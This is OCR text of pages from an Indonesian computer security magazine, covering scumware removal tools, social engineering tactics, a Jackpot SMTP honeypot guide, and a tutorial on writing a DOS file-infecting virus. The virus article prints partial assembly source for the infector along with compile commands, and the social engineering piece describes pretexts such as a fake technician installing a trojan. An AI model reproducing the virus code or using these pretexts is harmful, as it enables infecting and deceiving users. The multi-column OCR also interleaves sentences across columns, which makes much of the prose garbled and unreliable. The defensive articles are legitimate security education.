lain: gator, OfferCOmpanion, Trickler, GAIN, GMT.exe,
CMESys.exe dan lainnya. Gator sendiri menyebar dengan
meleburkan dirinya ke dalam file-file program sharing
seperti kazza, iMesh dan lainnya.
Gator memiliki 2 tujuan utama yaitu :
? ? engirimkan iklan-iklan kepada user.
?    Mengumpulkan informasi tentang kebiasan user dan
     mengirimkan kembali ke server utama gator.
Menghilangkan Gator                                            Gambar 2. Program NoAdware

Gator terinstall di dalam folder C:\Program files\Gator\ dan   Dengan interface yang friendly user, tool ini dapat anda
di registry windows dengan nama GAIN di                        dengan mudah tetapi tool ini shareware dengan masa
HKEY_LOCAL_MACHINE>Software>Microsoft>Windows>Current          aktif trial 45 hari, ditambah lagi menu Remove untuk
version>Run . GMT sendiri terdapat di C:\program

14      NeoTek Vol. IV No. 11
                                                                                            NeoStart

yang berfungsi untuk menghilangkan scumware di non-                                                          anda telah
aktifkan. Namun anda dapat membeli serial number-nya                                                         melakukan
di website resminya.                                                                                         setting
Klik tombol scan My PC, maka NoAdware segera melakukan                                                       browser
scanning di PC anda dari scumware. Akan terlihat nanti-                                                      anda dengan
nya file-file scumware apa saja yang terdapat dalam PC.                                                      menghilang-
Bahkan keylogger pun ikut terlihat keberadaannya. Jika                                                       kan auto
meng-klik nama dari scumware tersebut, terlihat di kolom                                                     complete,
                                                              Gambar 6. ZeroSpyware menjaga setting browser
item description keterangan tingkat bahaya dan tipe dari                                                     sebuah
scumware yang tertangkap menyusup di PC.                      spyware juga memiliki kemampuan untuk merubahnya
                                                              agar auto complete tersebut dapat di aktifkan dan mengi-
                                                              rimkan log kepada pembuatnya. ZeroSpyware menjaga
                                                              setting browser tersebut dari kenakalan Spyware.
                                                              Fitur yang lainnya yang membuat saya kagum adalah se-
                                                              mua badan program ini memiliki Animasi. Ini yang belum
                                                              saya temukan dari software-software terkemuka lainnya,
                                                              selain software multimedia tentunya, bahkan AntiVirus
                                                              sendiri tidak memakai sistem animasi. Mungkin dengan
                                                              memakai animasi seperti ini maka pembuat ZeroSpyware
                                                              ingin melihat sisi Friendly User-nya lebih ditampilkan
                                                              dan dari segi pengguna juga dapat menggunakan dan me-
Gambar 3. Pencarian scumware dengan menggunakan NoAdware
                                                              mahami tool ini sebagai teman dan bukan sebagai satpam.
Tools lain yang sebanding dengannya adalah adaware dari       Namun memang dibutuhkan sebuah VGA card yang cu-
lavasoft, www.lavasoftusa.com.                                kup untuk melihat animasi ini tanpa memberatkan kom -
                                                              puter. Animasi ini bukan hanya dalam badan program
Tool lain yang dapat digunakan dalam memerangi scumware       saja, melainkan di menu HELP-nya digunakan animasi,
yang sangat saya kagumi dikarenakan sifatnya seperti          sehingga sebuah penjelasan mengenai spyware dan peng-
Anti Virus PC-Cillin yang bisa memonitor aktivitas sebuah     gunaan maupun fitur dan tujuan utama program ini dapat
virus. ZeroSpyware, program yang dimaksudkan adalah           dimengerti pengguna tanpa harus membaca keterangan
sebuah Real Time Anti Spyware Monitor Program , ke-           dibawahnya. Sangat inovatif dan kreatif.
mampuannya memonitor file-file yang masuk maupun
                                         yang telah bera-                                                Database
                                         da didalam kom-                                                 spyware pro-
                                         puter yang didu-                                                gram ini bisa di
                                         ga sebagai                                                      update dan
                                         Spyware yang                                                    lengkap untuk
                                         selanjutnya nan-                                                mencari
                                         ti akan dicekal                                                 spyware dan
                                         (cegah tangkal)                                                 melindungi dari
                                         jika ditemukan                                                  spyware. Me-
                                         akan memasuk-                                                   ngingat bahasan
Gambar 4. ZeroSpyware Alert                                                                              edisi lalu menge-
                                         kannya ke ka-         Gambar 7. ZeroSpyware mendeteksi Blazzing
rantina. Didalam karantina anda dapat melihat keterangan                                                 nai Blazzing
                                                               Perfect Keyloger
dari sebuah spyware sendiri, dimana letak keberadaannya                                                  Perfect
dan menghapusnya.                                             Keylogger, dimana yang sudah canggih untuk dapat di
                                                              jalankan di komputer korban secara diam-diam dan fire-
                                                              wall pun dapat di buat lengah olehnya. Tetapi dengan
                                                              ZeroSpyware, keylogger tersebut dibuat lemah tak berda-
                                                              ya, dikarenakan dalam database ZeroSpyware ini terdapat
                                                              data-data mengenai keylogger tersebut.
                                                              Langkah pencegahan lainnya yaitu langsung dari
                                                              www.sysinternals.com/ntw2k/freeware/procexp.shtml
                                                              yang dapat membantu anda memonitor software apa saja
                                                              yang sedang berjalan di komputer anda. Pembersihan se-
                                                              cara berkala di registry system, msconfig, startup menu
                                                              juga membantu anda terhindar dari segala bentuk scumware
                                                              dan juga baca-baca tentang scumware yang terbit setiap
                                                              harinya di www.cexx.org.
                                                              Dan, di www.astalavista.com anda dapat membaca artikel
Gambar 5. ZeroSpyware Quarantine
                                                              tentang Spyware dan Amerika sebagai negara adidaya na-
                                                              mun di web ini diterangkan bahwa spammer di negeri
Download tool ini di www.zerospyware.com, pilihan yang        tersebut memiliki ratting tertinggi di dalam dunia Spam.
bijak jika kita memutuskan untuk memiliki dan menginstal      Nah, dengan pembahasan tentang scumware ini maka
di PC kita, terlebih lagi apabila sering menggunakan inter-   saya harap pembaca dapat lebih bijak dalam surfing ria,
net sebagai bagian dari alat bekerja.                         dan dapat menghindari scumware yang mengganggu.
Fitur lainnya adalah menjaga setting browser anda. Ketika

                                                                                            Vol. IV No. 11 NeoTek     15
                     NeoStart


                                                                COMPUTER SECURITY
                                                    Social Engineering
   Social engineering sudah beberapa kali dibahas di majalah ini, tetapi seakan-akan masih kurang
   untuk membeberkan informasi mengenai hal yang akan menjadi bahasan kali ini. Andi Ismayadi
          (fuzk3_kendi@yahoo.com) kembali mengangkat bahasan seputar social engineering demi
       memuaskan dahaga pembaca setia NeoTek yang masih penasaran dengan social engineering.

 B
        IASANYA MASYARAKAT AWAM UMUMNYA MENGETA -               meminta akses administrator, selanjutnya semua jaringan
        hui bahwa hacker hanya menggunakan komputer             akan berada ditangan.
        dan internet dalam mem-penetrasi jaringan tar-          Website kontes palsu, membuat sebuah web palsu dengan
getnya. Namun mereka tidak tahu kalau hacker juga meng-         content informasi sebuah kontes dengan hadiah-hadiah
gunakan teknik hacking tanpa komputer dan teknologi             yang menarik, pendaftaran dibuka dan nantinya yang
apapun dalam aksinya.                                           mendaftarkan diri menjadi member. Data-data member
Social engineering merupakan teknik hacking yang dilaku-        dirangkum dan e-mail berikut password login dicocokkan
kan dengan melihat segi sosial antar hubungan manusia,          ke account email yang dimiliki oleh member.
dan social engineering sendiri melakukan penetrasi pada         Karyawan gadungan, meyakinkan bagian sekuriti (sat-
sebuah keamanan melalui celah psikologis dari seorang ma-       pam) seakan-akan kehilangan kunci ke ruang kerja dan
nusia. Biasanya dalam hacking biasa kita menemui sebuah         ruang komputer, lalu dengan pengaruh tersebut satpam
interface misal saja itu sebuah web, konsol dan lainnya.        akan membukakan ruang komputer dan ruang kerjanya,
Dalam social engineering juga terdapat interface, namun         selanjutnya aksipun dimulai.
dalam hal ini yang dijadikan interface adalah karyawan
sebuah perusahaan yang dijadikan target.                        Kelihatannya gampang, namun social engineering meru-
                                                                pakan teknik hacking yang paling sulit untuk dilakukan
Perbandingan Common Hack dengan Social                          dan juga sulit untuk ditanggulangi karena tekniknya yang
Engineering                                                     berhadapan dengan korban secara langsung dengan pengaruh-
Common Hack                                                     pengaruh yang ditebarkan si hacker susah untuk dilihat.
                                                                Orang-orang yang telah menyandang predikat social
                                                                engineer terbaik adalah Kevin D. Mitnick, Ira Winkler,
                                                                dan satu wanita yang bernama Susan Thunder.
                                                                Social engineering juga sering dipakai dalam industri
                                                                espionage (mata-mata), wanita dalam sosial engineering
                                                                lebih diuntungkan dari pria dikarenakan lebih dapat meng-
Gambar 1. Common Hack                                           gugah kepercayaan korban dengan segala dayanya.
                                                                Dalam melakukan aksinya, social engineer terlebih dahulu
Sosial Engineering                                              mengumpulkan data-data yang berhubungan dengan peru-
                                                                sahaan/lembaga yang dijadikan terget sebanyak mungkin,
                                                                ini dimaksudkan untuk mempermudah dalam mempenga-
                                                                ruhi dan mendapatkan kepercayaan orang-orang dalam
                                                                perusahaan seperti karyawan, satpam dan lainnya. Namun
                                                                yang paling sering menjadi korban sosial engineering adalah
                                                                bagian Humas dan Call Center sebuah perusahaan, karena
Gambar 3. Save database                                         bagian-bagian ini bertugas memberi informasi kepada
                                                                orang luar yang ingin tahu lebih tentang perusahaannya.
Setelah melihat gambaran di atas, dapat dilihat perbedaan       Social engineer yang sukses dapat mengambil informasi-
hacking biasa dengan metode social engineering. Dalam           informasi berharga, antara lain yaitu:
social engineering sendiri hacker harus punya kemampuan
bicara yang bagus, karena hanya mengandalkan kemampuan          ?   Password user atau administrator.
bicara saja untuk mendapatkan kepercayaan.                      ? Informasi karyawan dan kunci untuk masuk ke dalam
Contoh-contoh dari social engineering                             perusahaan, terutama ruang penting seperti ruangan
                                                                  komputer.
Tim teknis palsu, berpura-pura sebagai tim teknis yang
menangani kerusakan-kerusakan komputer perusahaan,              ? Laporan keuangan yang bersifat rahasia.
kemudian memberitahu kepada korban untuk menginstalasi          ?   Daftar pelanggan dan prospek penjualan perusahaan.
sebuah program sebagai patch pada komputer-komputer
yang ada. Program ini sudah ditentukan si hacker dan ten-       Apabila semua data informasi di atas bocor ke lingkungan
tu saja sebuah malware seperti trojan, keylogger dan lainnya.   luar perusahaan, maka perusahaan akan terancam bang-
                                                                krut, kesetiaan pelanggan berkurang, dan lain sebagainya.
Vendor software palsu, berpura-pura sebagai Person of
Contact (PoC) dari program yang digunakan oleh perusa-          Untuk menjalani aksinya dalam social engineering maka
haan yang bersangkutan dan mencoba meyakinkan akan              perlu dilakukan empat tahapan, yaitu:
melakukan update, namun sebelumnya terlebih dahulu              ?   Melakukan riset

16   NeoTek Vol. IV No. 11
                                                                                               NeoStart

?   Membangun kepercayaan                                        Setelah social engineer mendapatkan sebuah kepercayaan
?   Mengeksploitasi sebuah hubungan untuk sebuah                 dari korbannya, langkah selanjutnya adalah mencoba untuk
    informasi melalui kata-kata, aksi atau teknologi             menggali informasi berharga perusahaan dari lingkungan
                                                                 internal. Apabila di langkah awal telah dilakukan pengum-
?   Menggunakan informasi yang dikumpulkan untuk                 pulan informasi secara umum atau diluar lingkungan peru-
    tujuan-tujuan berikutnya.                                    sahaan, maka kali ini mengumpulkannya dari dalam. Social
Mengais Informasi                                                engineer melakukannya dengan pelan dan hati-hati, kare-
                                                                 na bisa saja nantinya kepercayaan yang telah didapat akan
Seperti yang telah disebut diatas, bahwa social engineer         hilang begitu saja. Dengan keahlian berbicaranya, social
pertama kali kebiasannya adalah mengumpulkan informasi-          engineer akan fokus kepada sebuah pembicaraan dengan
informasi umum seputar targetnya. Mencari informasi              korban dengan cepat namun tepat sehingga korbanpun akan
tersebut dapat dengan berbagai cara, antara lain:                kehilangan konsentrasi berbicara, akibatnya ia akan men-
Memakai Internet, mencari sumber informasi di internet           jawab segala pertanyaan yang diajukan social engineer.
lebih mudah dibandingkan mencarinya di selembar koran,           Mengeksploitasi sebuah hubungan tidak selalu hanya ber -
cukup membuka Google lalu mencari informasi yang berkaitan       temu dengan korban secara langsung tatap muka. Namun
dengan perusahaan yang menjadi target. Atau mencari le-          secara online pun juga bisa mengeksploitasinya, bisa saja
bih detail di www.hoovers.com, finance.yahoo.com, www.sec.gov.   social engineer dengan kepercayaan yang ia dapat mengi-
Dumpster Diving/Trashing, dumpster diving adalah tek-            rimkan email ke korban menyuruhnya untuk melakukan
nik pencarian informasi perusahaan dari dalam dengan             patch Operating System yang dimiliki dengan sebuah program
cara yang tidak lazim, yaitu mengais di tempat sampah            yang didalamnya terdapat remote control. Ataupun dengan
perusahaan. Karena karyawan tidak terlalu memikirkan             menyisipkan keylogger atau trojan di sebuah gambar ke-
dokumen yang telah mereka simpan sehingga kopiannya              luarga. Apapun bisa terjadi setelah kepercayaan didapat.
seringkali dibuang begitu saja. Bahaya dari informasi            Pencegahan Social Engineering
yang bisa diambil, yaitu:
                                                                 Setelah dibahas panjang lebar tentang social engineering,
?   Daftar nomor telepon intern perusahaan                       maka dengan begitu kita perlu mengetahui bahwa bahaya
?   Buku pedoman karyawan                                        yang ditimbulkan bisa lebih besar daripada hacking umumnya
?   Struktur organisasi                                          yang hanya merusak sebuah sistem jaringan komputer.
                                                                 Social engineering bisa dikatakan ilmu mata-mata, ilmu
?   Daftar password                                              yang berbahaya yang perlu dipelajari untuk mengetahui
?   Nota rapat                                                   kelemahan diri sendiri dan menangkal dari tindakan social
                                                                 engineering. Berikut beberapa cara pencegahannya.
?   Laporan-laporan
                                                                 Dari sisi perusahaan:
?   Diagram jaringan, dan lainnya
                                                                 ? Mengklasifikasi data-data
Sistem telepon, social engineer mencari tahu info tentang
seorang karyawan hanya dengan mendengar sistem tele-             ?   Memusnahkan data karyawan dan kontraktor dan
ponnya, apakah teleponnya menaruh pesan di mailbox                   user idnya
atau tidak. Apabila ya, maka social engineer pun tahu ke-        ?   Mengganti password secara berkala
mana dan berapa lama si karyawan pergi, agar nantinya ia
                                                                 ?   Menangani informasi yang rahasia secara benar
bisa berpura-pura sebagai karyawan tersebut dalam aksi-
nya nanti.                                                       ?   Mengawal tamu yang berkunjung ke dalam perusahaan
Membangun Kepercayaan                                            Dari sisi user:
Kepercayaan merupakan kunci utama dalam keberhasilan             ? Meningkatkan kesadaran keamanan dan melatih
sebuah social engineering, namun kepercayaan adalah hal             sebagai investasi bisnis
yang susah didapat namun gampang sekali hilang. Biasanya         ?   Melatih userakan dasar-dasar keamanan agar tetap
kita hanya mempercayai orang yang sudah kita kenal sebe-             terjaga keamanan perusahaan.
lumnya, atau orang yang memang membutuhkan bantuan.
Bagaimana social engineer mendapatkan kepercayaan ter-           ?   Biasakan memusnahkan dokumen-dokumen, jangan
sebut dengan cepat, kita lihat tekniknya yaitu:                      dibuang tapi di musnahkan, bisa dengan shredder.
Likability, teknik ini dilakukan berdasarkan informasi awal      ?   Jangan pernah memberikan password kepada siapapun
dari hasil mengumpulkan informasi umum mengenai tar-             ?   Menggunakan password yang berbeda
get. Disini, social engineer membangun kepercayaan dengan
melihat sisi kesukaan atau ketertarikan korban. Social           ?   Mengganti password secara berkala
engineer akan mengajak korban untuk bertemu dan mulai            ?   Jangan pernah membuka ataupun mengirim file ke
membahas tentang kesukaannya, dengan begitu korban                   atau dari orang asing.
akan mulai menyukai social engineer tersebut, dan dari           Dengan pencegahan diatas, mudah-mudahan anda dapat
sisi social engineer sendiri ia telah berhasil membangun         terhindar dari social engineering. Dan untuk mengetahui
kepercayaan pada diri korban.                                    lebih lanjut dan contoh kasus tentang social engineering
Believability, kemampuan untuk dipercayai korban dengan          anda dapat membaca buku The Art Of Deception karya
sikap yang baik, sopan dan berpura-pura sebagai orang pen-       Kevin D. Mitnick dan Spies Among Us karya Ira Winkler.
ting di perusahaan korban ataupun sebagai orang yang di-         Dan jangan samakan sosial engineering dengan Menipu
kenal korban secara baik ,namun belum pernah bertemu,            karena berbeda jauh, anggapan ini sering saya dengar. Ja-
bisa saja kenalan di chating atau dari program messenger.        dikan informasi ini sebagai bahan pelajaran dan tidak di-
Mengeksploitasi Sebuah Hubungan                                  gunakan untuk hal-hal ilegal. Penulis tidak bertanggung
                                                                 jawab atas penyalahgunaan tulisan ini.

                                                                                               Vol. IV No. 11 NeoTek    17
                    NeoStart


                                             COMPUTER SECURITY
                                Membuat Virus 486
        Menjadi korban virus mungkin adalah hal yang menyedihkan. Bahasan seputar virus adalah
           bahasan yang asyik untuk disimak, telah beberapa kali bahasan virus diangkat di majalah ini.
      ’Ade The Teroris’ memberikan cara membuat virus dengan menggunakan Assembly Language,
                                                           yaitu bahasa pemrograman yang populer.

    K
          ITA PARA PENGGUNA KOMPUTER YANG SUDAH AHLI         Cara mengkompile
        atau professional maupun para pemula dan semua       tasm /m2 <filename>.asm
        penguna komputer tentu sudah tidak asing lagi        tlink /t <filename>.obj
dengan istilah virus komputer, atau anda telah menjadi
korbannya.                                                   Listing virus _468
Bagaimana perasaan anda pada waktu anda menjadi kor-         Ketikan listing virus ini dengan pelan-pelan dan teliti lalu
ban keganasan virus komputer? Yang saya tahu pasti anda      simpan dengan nama _486.Asm atau nama yang lain
kesal, marah, frustasi dan mengutuk para pembuat virus.      yang penting harus berekstensi Asm (*.Asm), dan
                                                             compile-lah sesuai cara diatas sehingga dapat membentuk
Tapi tidak semuanya begitu, ada sekelompok orang yang        suatu program (virus).
senang bila komputernya terkena virus atau mereka se-
ngaja memasukkan virus kekomputer mereka, apalagi vi-                  .model tiny
rus itu jenis baru dan yang pasti lebih berbahaya. Dan                 .code
mereka nantinya akan meneliti virus tersebut lalu dikem-               org   100h    ; melakukan penyesuaian untuk psp
bangkan untuk dijadikan virus yang lebih berbahaya.           start:
                                                                   call     get_disp           ; masukkan ip
Tapi bagaimana dengan perasaan pembuat virus itu?             get_disp:
Apakah senang, bangga atau biasa saja?                             pop       bp
Di dalam artikel ini anda akan saya ajak untuk ikut mera-          sub       bp, offset get_disp ; bp = penggantian ; kode
sakan dalam membuat virus komputer, buku ini ditulis                                             ; label offset asli disimpan
                                                                                                 ;di dalam kode mesin
hanya untuk pembelajaran atau hanya untuk pendidikan          save_path:
semata, dan semuanya saya kembalikan kepada sikap ke-                mov     ah, 47h              ; simpan cwd
dewasaan anda.                                                       xor    dl, dl               ; 0 = default drive
Di artikel ini anda akan diajari cara-cara membuat virus             lea si, [bp + org_path]
komputer dengan bahasa pemrograman tingkat dasar atau                int 21h
                                                              get_dta:
bahasa mesin yaitu bahasa pemrograman assembler atau
                                                                     mov     ah, 2fh
assembling, yang banyak digunakan oleh para pembuat                  int 21h
virus, dikarena ukuran file yang dihasilkan (dibuku ini              mov     [bp + old_dta_off], bx        ; simpan dta offset tua
adalah virus) lebih kecil dibanding dengan bahasa pem-        set_dta:                                     ; merekam dta
rograman lainnya tanpa mengurangi kemampuannya                       mov     ah, 1ah
yang dashyat.                                                        lea   dx, [bp + dta_filler]
Dan listing virus yang akan saya berikan pada pertemuan              int 21h
                                                              search:
ini adalah listing virus _468.
                                                                     mov     ah, 4eh                       ; temukan file pertama
Listing virus ini di kembangkan dari virus ALT-11 Mag                mov cx, [bp + search_attrib]          ; jika dta sukses
dan diberi nama _468, apa artinya nama itu, yang pasti        diciptakan
lebih ganas dan bagus, maunya sih.                                   lea    dx, [bp + search_mask]
                                                                     int   21h
Keterangan Virus _468                                                jnc clear_attrib          ;jika ditemukan, melanjutkan
? Tidak menginfeksi command.com                               find_next:
                                                                     mov     ah, 4fh     ; ke file berikutnya
?    Pertambahan file .com: xxx byte                                 int   21h
?    Dapat mencari direktori untuk file yang belum pernah            jnc   clear_attrib
                                                              still_searching:
     terinfeksi, bila tidak ada akan mencari direktori               mov     ah, 3bh
     sebelumnya, sampai file terinfeksi                              lea    dx, [bp + previous_dir]      ; cd ..
?    Tidak akan melakukan lagi bila (melakukan                       int   21h
     penginfeksian) file yang sudah terinfeksi (setiap
     berjalan menginfeksi satu)                              TextBox 1. Script code lengkap dapat ditemukan di lampiran yang
?    Akan mengembalikan atribut asli dari file yang          disediakan di dalam CD yang disertakan bersama majalah ini.
     diinfeksinya dan mengembalikan alur aslinya (original   Sekian dulu pertemuan kita pada kali ini, suatu saat ka-
     path)                                                   lian pasti bertemu denganku pada artikel artikel selan-
?    File yang memiliki atribut atau bendera read only       jutnya, yang pasti tidak kalah menariknya.
     (hanya membaca) tetap dapat diinfeksi                   Sampai jumpa lagi...

18      NeoTek Vol. IV No. 11
                                                                                                   NeoTekno


                                                                                                 HONEYPOT
                             Anti-Spam Berbasis Java
   Pemanfaatan honeypot untuk menjebak hacker menjadikan honeypot sebuah pilihan yang
     tepat saat ini untuk menciptakan keamanan sistem yang anda miliki. Untuk melengkapi bahasan
      mengenai honeypot, Firrar Utdirartatmo (firrar@lycos.com) kembali membahas mengenai
                            honepot dengan membuat Jackpot honeypot Anti-Spam berbasis Java.
                                       SMTP RELAY YANG          Para pengguna Windows 98, jalankan Jackpot.bat untuk
  J
        ACKPOT MERUPAKAN HONEYPOT
        ditulis dalam bahasa Java, oleh pembuatnya di-          mengaktifkan Jackpot. Sedang pengguna Windows NT/XP/2K,
        sebut mail swerver (bukan mail server). Jackpot         lebih baik memakai shortcut jackpot.run. Dari Windows
akan nampak di Internet sebagai open SMTP relay, dan            Explorer klik kanan file jackpot.run.lnk, edit working fol-
dimaksudkan untuk menarik perhatian spammer (dan                der ke tempat dimana anda melakukan unzip Jackpot, dan
juga hacker).                                                                                       ubah ikon ke honey.ico
Jackpot bisa mengamati spam yang dicatat secara real-time.                                          di folder tersebut.
Kita bisa memeriksa perintah-perintah yang dikirim seba-                                                Nantinya jendela con-
gai spam ke Jackpot, yang mana sulit dilakukan bila kita                                                sole Jackpot akan mem-
hanya mengandalkan spamtrap address. Dengan menja-                                                      punyai ikon honeypot
lankan suatu honeypot relay di komputer kita, kita telah                                                yang cantik tersebut
berkontribusi pada perang melawan spam email.                                                           ketimbang ikon default
Idealnya, untuk memasang Jackpot, komputer kita terhu-                                                  black-screen. Setelah
bung ke Internet dengan alamat IP permanen. Karena                                                      Jackpot dijalankan, kita
spammer biasanya mengirim bulk mail mereka beberapa                                                     bisa mengakses web-
hari setelah menemukan suatu open relay. Sementara bi-                                                  server Jackpot (port
la memakai koneksi dial-up, kali lain ia mencoba mencari                                                default 8080) untuk
komputer kita mungkin saja kita tidak sedang online atau                                                memeriksa spam yang
alamat IP kita mengalami perubahan. Spammer juga akan                                                   ditangkap dan menge-
mengabaikan komputer anda bila ia mengetahui bahwa                                                      lola program Jackpot
koneksi anda adalah dial-up.                                                                            dengan menggunakan
                                                                Gambar 2. Properties shortcut Jackpot
                                                                                                        browser web ke alamat
Instalasi & konfigurasi
Jackpot ditulis sepenuhnya dalam Java, sehingga di kom-         http://servername:port/html/, contoh
puter kita perlu diinstall dulu Java Runtime Environment        http://192.168.0.1:8080/html/.
(JRE) atau Java Develompment Kit (JDK/J2SDK) versi 1.3          Untuk mengakses layanan administrator, anda memerlu-
ke atas. Jackpot bisa berjalan pada Windows 2000/XP/NT/98/ME,   kan userid dan password yang dapat diubah dari baris be-
dan seharusnya berjalan baik juga pada Linux. Perlu di-         rikut pada jackpot.properties:
ingat, Jackpot memakai thread secara intensif, dan hal ini
                                                                #UserID for access to web-admin
belum tertangani dengan cukup baik oleh Windows 98/ME.
                                                                AdminUser=admin
Untuk menginstall software ini, lakukan unzip file              #Password for access to Web-admin
jackpot-1.2.2.zip ke suatu folder. Anda akan melihat se-        AdminPassword=admin
jumlah file konfigurasi di situ. Kita bisa mengedit file
jackpot.properties yang merupakan pasangan key/value,           Nomor port server web tersebut dapat diubah pada baris
dimana value adalah string yang dipergunakan Jackpot            berikut (default 8080), mengubahnya akan menyulitkan
sebagai suatu respon pada perintah-perintah dari spam-          hacker yang melakukan fingerprint:
mer. Dengan mengubahnya dari konfigurasi default, anda          #Port for serving HTTP; it would be a good idea to change this,
bisa menyulitkan deteksi fingerprint spammer bahwa              because the
relay kita sebenarnya adalah honeypot.                          #Jackpot server could be fingerprinted by finding it's HTTP
                                                                server.
                                                                HttpPort=8080
                                                                Jangan lupa mengubah variabel Server (default adalah
                                                                Jackpot) yang merupakan header HTTP:
                                                                #This entry specifies the value retuned in the "Server: " HTTP
                                                                header returned
                                                                #by Jackpot. By default, Jackpot claims to be "Jackpot" (with
                                                                the current version number).
                                                                ServerHeader=
                                                                Anda bisa melakukan aksi tarpit alias memperlambat
                                                Gambar 1.
                                                                koneksi spammer dengan mengubah baris berikut:
                                                Hasil unzip     #Extra time taken to respond to commands when in a spamrun.
                                                Jackpot         #This is applied to every line entered in a HELO dioalog; the

                                                                                                   Vol. IV No. 11 NeoTek     19
                    NeoTekno

default is 1s. This                                                                                                      03/11/08
#is enough to make a HTML message from Outlook Express                                                                   05:55:16 GMT
take almost a minute to enter.                                                                                           HTTP
TarpitDelay=3000                                                                                                         127.0.0.1
#The amount of time considered 'too soon' for the purposes of                                                            127.0.0.1
determining if a                                                                                                         POST
#message should be relayed. Messages submitted via SMTP                                                                  /update.html
may also be subject to                                                                                                   HTTP/1.1
#tarpitting if they arrive 'too soon'. Default is 20s.
                                                                                                                Kita bisa
MinSpamInterval=20000
                                                                                                                melihat dan
#Whether to start up with tarpitting enabled                           Gambar 5. Mengirim mail
                                                                                                                mengelola
StartupTarpit=yes
                                                                       spam yang masuk dengan memakai browser, misal di sini
Bila perlu batasi jumlah spam yang akan disimpan untuk                 ke alamat http://192.168.0.1:8080/html/.
tiap asal spam:
#Specifies a limit on the number of spams that should be stored for
#each spam-source.
MaxStoragePerSource=100
Pengujian
Jalankan Jackpot dengan klik shortcut Jackpot atau menja-
lankan Jackpot.bat                                                     Gambar 6. Browsing ke server web Jackpot
03/11/08 05:43:44 GMT STATUS Jackpot Mailswerver version 1.2.2
03/11/08 05:43:53 GMT STATUS Started SMTP for 192.168.0.1              Browse spam log untuk melihat log spam yang ada dike-
03/11/08 05:43:53 GMT STATUS Serving SMTP on port 25 for 192.168.0.1   lompokkan berdasar asal komputer.
03/11/08 05:43:53 GMT STATUS Serving HTTP on port 8080
Nampak yang dijalankan adalah SMTP server dan HTTP
server. Sekarang kita tes dengan mengirim email, di sini
dengan program client Bat yang pernah disertakan dalam
CD Neotek, anda bisa saja memakai yang lain. Yang perlu
di-setting adalah alamat SMTP Server.




                                                                       Gambar 7. Log spam




Gambar 3. Alamat SMTP server

Lalu kita coba menulis mail dan mengirimkannya (perha-
tikan gambar 4 dan 5).



                                                                       Gambar 8. Spam yang dikirim oleh satu komputer asal




Gambar 4. Menulis mail

Yang nampak pada Jackpot:
03/11/08 05:53:43 GMT SMTP 192.168.0.2    192.168.0.1
EHLO NEWBIE
03/11/08 05:54:58 GMT STATUS Spam interval updated to
356910s.
                                                                       Gambar 7. Isi spam

20    NeoTek Vol. IV No. 11
                                                                                                NeoTekno

Nampak aktivitas akses ke HTTP juga dicatat:                     analisa atau pengelolaan, bisa anda aktifkan lagi. Baris di
03/11/08 05:55:55 GMT HTTP 192.168.0.1         192.168.0.1       file jackpot.properties yang berkaitan:
GET /html HTTP/1.1                                               #Whether to start the HTTP service.
03/11/08 05:55:59 GMT HTTP 192.168.0.1         192.168.0.1       StartupHttp=yes
GET /html/ HTTP/1.1
                                                                 Penjelasan: proxy spam dan relay spam
03/11/08 05:55:59 GMT HTTP 192.168.0.1         192.168.0.1
GET /html/jackpot.css HTTP/1.1                                   Open proxy merupakan cara yang menarik bagi spammer
03/11/08 05:56:29 GMT HTTP 192.168.0.1         192.168.0.1       untuk mengirimkan mail. Open proxy adalah proxy yang
GET /html/hosts.html HTTP/1.1                                    memungkinkan orang melakukan koneksi ke sistem lain-
03/11/08 05:56:43 GMT HTTP 192.168.0.1         192.168.0.1       nya, tanpa perlu autentifikasi (misal dengan password).
GET /html/hosts/NEWBIE.html HTTP/1.1                             Proxy tidak melakukan store-and-forward, seperti yang
03/11/08 05:56:55 GMT HTTP 192.168.0.1         192.168.0.1       dilakukan mail-relay; tetapi perintah akan dikirim lang-
GET /html/hosts.html HTTP/1.1                                    sung ke sistem target. Proxy tidak menambahkan infor-
03/11/08 05:56:57 GMT HTTP 192.168.0.1         192.168.0.1       masi tracing ke "benda" yang dikirimnya, tetapi meme-
GET /html/hosts/NEWBIE.html HTTP/1.1                             lihara log lokal, dan meneruskannya tanpa perubahan.
03/11/08 05:56:59 GMT HTTP 192.168.0.1         192.168.0.1       Satu-satunya cara untuk menemukan penyalahgunaan
GET /html/messages/C0A80001-3E67150F                             open proxy adalah dengan melihat log proxy. Meski me-
File jackpot.log menyimpan log lengkap baik dari SMTP            ngundang masalah, masih banyak pihak yang gemar me-
server maupun HTTP server:                                       ngaktifkan open proxy, misal sejumlah website advertising.
                                                                 Kebanyakan SMTP server (yang dikonfigurasi dengan tepat)
                                                                 hanya menerima mail message yang memenuhi dua syarat:
                                                                 ?   Message dikirim oleh user domain yang menjadi
                                                                     tanggungjawab mail server
                                                                 ?   Message ditujukan pada user dalam domain tersebut.
                                                                 Dengan diperkenalkannya Domain Name System (DNS),
                                                                 mail server sering menerima mail dari siapa saja, untuk
                                                                 siapa saja; server akan melakukan usaha terbaik untuk re-
                                                                 lay mail ke mail-server dari mail-domain bersangkutan
                                                                 (bisa dengan meneruskan message ke mail-server lainnya).
                                                                 Server semacam itu disebut sebagai open relay .
                                                                 Spammer menyalahgunakan open relay yang ditemukan
                                                                 dengan melakukan spam melaluinya. Dengan mengala-
Gambar 9. File log jackpot                                       matkan setiap message ke sejumlah besar user, mereka bi-
                                                                 sa mengirim message dalam jumlah kecil ke relay, tetapi
                                   Untuk melakukan pengelo-      nanti pada ujungnya dapat mencapai banyak in-box.
                                   laan Jackpot, mulailah ke
                                   halaman awal, dan pilih       Jackpot bertindak seolah-olah open relay dalam konteks
                                   Administer Jackpot. Di sini   ini. Biasanya spam yang dikirim ke relay lebih dulu me-
                                   anda harus memasukkan         lalui open proxy, untuk menutupi identitas spammer. Ke-
                                   username dan password,        banyakan spam yang sampai pada Jackpot sebelumnya te-
                                   kalau anda belum mengu-       lah melalui open proxy, sehingga sulit untuk dilacak, ke-
                                   bah file jackpot.properties   cuali anda bekerjasama dengan admin proxy bersangkutan.
                                   maka defaultnya adalah        Bagaimanapun Jackpot server tetap memberikan manfaat:
                                   admin.                        ? Spam yang dikirimkan melalui Jackpot tidak bakal
                              Catatan: Untuk keamanan                sampai ke tujuan. Maka target spam aman dari
Gambar 10. Login pengelolaan                                         gangguan.
Jackpot                       anda, bila Jackpot dipergu-
                              nakan di dunia nyata, anda         ?   Jika banyak spam yang nyangkut di honeypot relay,
bisa matikan dulu service HTTP, agar tidak bisa diakses              spammer akan mengecek relay spam mereka. Untuk itu
web browser dari luar. Nanti saat anda perlukan untuk                mereka perlu memodifikasi spamware (ini menambah
